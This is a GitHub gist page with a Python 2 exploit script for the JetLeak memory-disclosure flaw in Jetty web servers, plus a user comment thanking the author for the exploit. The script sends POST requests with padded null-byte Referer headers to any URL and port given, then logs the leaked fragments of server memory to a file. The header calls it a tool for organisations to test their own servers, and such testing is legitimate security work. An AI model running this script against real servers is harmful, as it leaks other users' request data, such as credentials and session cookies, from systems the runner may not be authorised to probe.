@streaak
Created April 2, 2018 18:33
Exploit for Jetleak as seen in https://hackerone.com/reports/143935
# Python 2 script (uses the httplib and urlparse modules)
import httplib, urllib, ssl, string, sys, getopt
import datetime
import socket  # needed for the socket.error handler below
from urlparse import urlparse

# Results are also written to a timestamped text file
f = open('jetleak_' + datetime.datetime.now().strftime('%Y%m%d_%H_%M') + '.txt', 'w')

'''
Author: Gotham Digital Science, modified by molejarka
Purpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether
their Jetty web server versions are vulnerable to JetLeak. Currently, this script does
not handle sites with invalid SSL certs. This will be fixed in a future iteration.
'''

if len(sys.argv) < 3:
    print("Usage: jetleak.py [url] [port]")
    sys.exit(1)

url = urlparse(sys.argv[1])
if url.scheme == '' and url.netloc == '':
    print("Error: Invalid URL Entered.")
    sys.exit(1)

port = sys.argv[2]
conn = None

if url.scheme == "https":
    conn = httplib.HTTPSConnection(url.netloc + ":" + port)
elif url.scheme == "http":
    conn = httplib.HTTPConnection(url.netloc + ":" + port)
else:
    print("Error: Only 'http' or 'https' URL Schemes Supported")
    sys.exit(1)

b = 4
for j in range(1,350):
    for i in range(1,2):
        try:
            results = []
            x = chr(0) * (1 + b * j)
            headers = {"Referer": x}
            conn.request("POST", "/", "", headers)
            r1 = conn.getresponse()
            r1.read()
            # Keep a slice of the HTTP reason phrase and de-duplicate before logging
            results.append(r1.reason[221:-64])
            results = list(set(results))
            for r in results:
                print(r)
                f.write(r + '\n')
        except socket.error:
            # Connection failed or was dropped: open a new one and continue
            if url.scheme == "https":
                conn = httplib.HTTPSConnection(url.netloc + ":" + port)
            elif url.scheme == "http":
                conn = httplib.HTTPConnection(url.netloc + ":" + port)

f.close()

jatan77 commented May 8, 2020

Should add:
import socket

Without it, the code generates an error.

Huge thank you for this exploit.
